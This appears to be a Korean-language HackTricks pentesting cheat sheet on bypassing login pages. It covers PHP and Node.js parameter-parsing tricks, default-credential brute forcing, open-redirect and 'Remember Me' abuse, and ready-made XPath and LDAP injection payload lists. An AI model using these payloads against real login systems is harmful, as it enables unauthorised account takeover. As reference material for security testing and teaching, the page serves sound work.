로그인 우회

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

정상 로그인 우회

로그인 페이지를 찾으면, 이를 우회하기 위해 시도할 수 있는 몇 가지 기술이 있습니다:

• 페이지 내 주석 확인 (아래로 스크롤하고 오른쪽으로?)
• 제한된 페이지에 직접 접근할 수 있는지 확인
• 매개변수를 전송하지 않기 (아무것도 전송하지 않거나 1개만 전송)
• PHP 비교 오류 확인: user[]=a&pwd=b, user=a&pwd[]=b, user[]=a&pwd[]=b
• 내용 유형을 json으로 변경하고 json 값을 전송 (bool true 포함)
• POST가 지원되지 않는다는 응답을 받으면 GET 요청으로 본문에 JSON을 전송해 볼 수 있습니다: Content-Type: application/json
• nodejs의 잠재적 파싱 오류 확인 (읽기 이것): password[password]=1
• Nodejs는 해당 페이로드를 다음과 유사한 쿼리로 변환합니다: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; 이는 비밀번호 비트를 항상 true로 만듭니다.
• JSON 객체를 보낼 수 있다면 "password":{"password": 1}을 전송하여 로그인을 우회할 수 있습니다.
• 이 로그인을 우회하려면 여전히 유효한 사용자 이름을 알고 전송해야 한다는 점을 기억하세요.
• mysql.createConnection을 호출할 때 "stringifyObjects":true 옵션을 추가하면 매개변수로 Object가 전달될 때 모든 예기치 않은 동작을 차단할 수 있습니다.
• 자격 증명 확인:
• 사용 중인 기술/플랫폼의 기본 자격 증명
• 일반 조합 (root, admin, password, 기술 이름, 이러한 비밀번호 중 하나를 가진 기본 사용자).
• Cewl을 사용하여 사전을 만들고 기본 사용자 이름과 비밀번호(있는 경우)를 추가한 후 모든 단어를 사용자 이름과 비밀번호로 사용하여 무차별 대입 시도
• 더 큰 사전을 사용하여 무차별 대입 (무차별 대입)

SQL 인젝션 인증 우회

여기에서 SQL 인젝션을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다.

다음 페이지에서는 SQL 인젝션을 통해 로그인을 우회하기 위해 시도할 수 있는 사용자 정의 목록을 찾을 수 있습니다:

Login bypass List

No SQL 인젝션 인증 우회

여기에서 No SQL 인젝션을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다.

NoSQL 인젝션은 매개변수 값을 변경해야 하므로 수동으로 테스트해야 합니다.

XPath 인젝션 인증 우회

여기에서 XPath 인젝션을 통해 로그인을 우회하는 여러 가지 요령을 찾을 수 있습니다.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection 인증 우회

여기에서 LDAP Injection을 통한 로그인 우회에 대한 여러 가지 트릭을 찾을 수 있습니다.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

페이지에 “Remember Me” 기능이 있는 경우, 그것이 어떻게 구현되어 있는지 확인하고 이를 악용하여 다른 계정을 탈취할 수 있는지 확인하세요.

Redirects

페이지는 일반적으로 로그인 후 사용자를 리디렉션합니다. 그 리디렉션을 변경하여 Open Redirect를 유발할 수 있는지 확인하세요. 사용자를 귀하의 웹사이트로 리디렉션하면 일부 정보(코드, 쿠키 등)를 훔칠 수 있을지도 모릅니다.

Other Checks

• 로그인 기능을 악용하여 사용자 이름을 열거할 수 있는지 확인하세요.
• 비밀번호/민감한 정보 양식 입력에서 자동 완성이 활성화되어 있는지 확인하세요: <input autocomplete="false">

Automatic Tools

• HTLogin

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.